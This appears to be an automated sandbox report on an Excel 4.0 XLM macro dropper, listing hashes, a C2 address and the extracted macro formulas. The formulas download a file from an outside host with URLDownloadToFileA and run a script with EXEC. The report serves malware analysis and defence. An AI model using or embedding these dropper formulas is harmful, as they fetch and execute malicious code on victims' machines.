General

  • Target

    ce63fd007a13d7114025a424ea9610fe

  • Size

    6KB

  • Sample

    231222-r9f1jsdhfk

  • MD5

    ce63fd007a13d7114025a424ea9610fe

  • SHA1

    8697fd14323eadae5b308f55986801af64ce7241

  • SHA256

    61cecdcb21970e419132feaede4c40666adc258221bdbfff1bd75f47f2b9f43b

  • SHA512

    58fe231ddb93ee41e3cea32e042a071c5875082ea15b522bbd7bb9528b33e8ceed02258df9099cba82b6d09acc79a51cdb30ee5771e9044feb1d3b7326cc9bad

  • SSDEEP

    192:NDSHuSdbrA2OmmfRU8UhHFBFYuCb98ylQKG+P:NkuWM2wW1FYHb98ylQe

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Targets

    • Target

      ce63fd007a13d7114025a424ea9610fe

    • Size

      6KB

    • MD5

      ce63fd007a13d7114025a424ea9610fe

    • SHA1

      8697fd14323eadae5b308f55986801af64ce7241

    • SHA256

      61cecdcb21970e419132feaede4c40666adc258221bdbfff1bd75f47f2b9f43b

    • SHA512

      58fe231ddb93ee41e3cea32e042a071c5875082ea15b522bbd7bb9528b33e8ceed02258df9099cba82b6d09acc79a51cdb30ee5771e9044feb1d3b7326cc9bad

    • SSDEEP

      192:NDSHuSdbrA2OmmfRU8UhHFBFYuCb98ylQKG+P:NkuWM2wW1FYHb98ylQe

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks